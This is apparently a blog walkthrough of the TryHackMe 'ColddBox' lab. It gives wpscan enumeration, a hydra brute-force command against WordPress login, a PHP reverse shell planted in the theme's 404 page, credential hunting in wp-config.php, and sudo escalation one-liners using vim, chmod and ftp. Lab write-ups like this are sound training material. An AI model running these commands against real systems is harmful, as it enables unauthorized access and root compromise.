ColddBox— TryHackMe Walkthrough
Hello! Today I am solving ‘ColddBox’ on TryHackMe.
This is an easy-rated box which can be exploited by brute forcing the Wordpress CMS
Room Link: https://tryhackme.com/r/room/colddboxeasy
Lets get started!
I’ll start off by adding the target IP address to /etc/hosts
file.
Step 0: Reconnaissance
To enumerate the host for open ports I’ll use Nmap(Network Mapper).
We get 2 open ports, lets enumerate those further
Brief
- 80/tcp — HTTP — running an Apache 2.4.18 web server with Wordpress CMS.
- 4512/tcp — SSH — used to remotely access the system.
Step 1: Web Exploitation
Lets fire up the browser and check the website for any clues.
Seems like a normal website, nothing fishy in the source code too.
Since its running Wordpress, we can use wpscan
to enumerate the website for crucial information like usernames, vulnerabilities etc. which can be used to exploit
wpscan --url http://coldd.thm -e vp,vt,u -o logs/wpscan -f cli-no-colour
The above command will enumerate the CMS for vulnerable plugins(vp), vulnerable themes(vt), usernames(u)
Identified 4 users, but we’ll omit the first one since wordpress doesn’t allow spaces in username(P.S. its a false positive), lets put them in a list and bruteforce using hydra
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt coldd.thm -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -F
I’m using -F
switch to stop hydra once a valid pair of credential is found.
Gottem! Now lets login and get access of the CMS.
Now that we have the access of CMS, lets try uploading our malicious php reverse shell.
We’ll do this by going to the theme editor(Appearance > Editor) and updating the 404 page’s code to our reverse shell’s code.
Now update the file.
Step 2: Compromising the system
Now that we have our malicious reverse shell code on the web server, set up a netcat listener and then send a request to the 404 page(send a request to any page that doesn’t exist on the website, ?p=777 in this case)
curl -L http://coldd.thm/?p=777
And we get a shell!
But first, lets stabilise it.
python3 -c 'import pty; pty.spawn("/bin/bash")'; export TERM=xterm
<CTRL + Z>
stty raw -echo; fg
Lets grab the user flag.
Gotta do a horizontal privilege escalation to c0ldd
Lets go back to the applications directory and search for credentials inside config files.
Easy catch!
cat wp-config.php | grep pass -A 5 -B 5
Lets switch the user and grab the first flag.
One down! Lets grab the other one.
Step 3: Privilege Escalation
Lets vertically escalate our privileges now.
Right off the bat we’ll check for the commands that can be executed by the current user as root using sudo -l
command.
3 commands, 3 paths to become root. Lets explore each one-by-one.
Vim
sudo vim -c ':!/bin/bash'
chmod
sudo chmod 6777 /bin/bash
/bin/bash -p
ftp
sudo ftp
!/bin/bash
Conclusion
ColddBox is an easy rated room which can be rooted by brute forcing the weak credentials used for wordpress CMS.